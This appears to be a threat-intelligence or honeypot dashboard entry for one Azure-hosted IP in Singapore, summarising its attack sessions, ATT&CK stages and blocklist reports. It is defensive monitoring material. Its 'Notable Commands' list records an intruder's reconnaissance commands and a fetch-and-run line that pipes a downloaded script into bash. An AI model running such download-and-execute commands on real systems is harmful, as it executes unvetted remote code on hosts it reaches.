← Back to feed
Location
🇸🇬 SG / Singapore
ASN
AS8075 · Microsoft Corporation
Cloud Provider
Microsoft Azure
Total Events
63
Average by volume
Agent Count
1
First / Last Seen
2026-04-23 08:49 — 2026-04-23 10:11
Attack Types
MITRE ATT&CK Techniques
Reconnaissance
Initial Access
Command and Control
External Corroboration
Blocklist.de
blocklist_de:reported
Campaigns
Not associated with any campaigns
Session Forensics
Sessions
8 (7 with login)
Avg Depth Score
0.6
Commands Executed
7
Files Downloaded
1
Notable Commands
- pwd
- ls -la /
- uname -a
- wget -qO- bench.sh | bash
- netstat -tulpn | head -10
Download URLs
- http://bench.sh
Fingerprints
HASSH
SSH Client
Evidence Timeline
Reconnaissance
dd1e7b7be5f8
LOGIN
1
1
60%
Loading events...
Reconnaissance
6759315c7c1b
LOGIN
1
1
60%
Loading events...
Reconnaissance
feeb07765073
LOGIN
1
1
60%
Loading events...
Reconnaissance
02b06f6e76ff
LOGIN
1
1
60%
Loading events...
Malware Dropper
33f03953292f
LOGIN
1
1
1
100%
Loading events...
Reconnaissance
a03623d27b3e
LOGIN
1
1
60%
Loading events...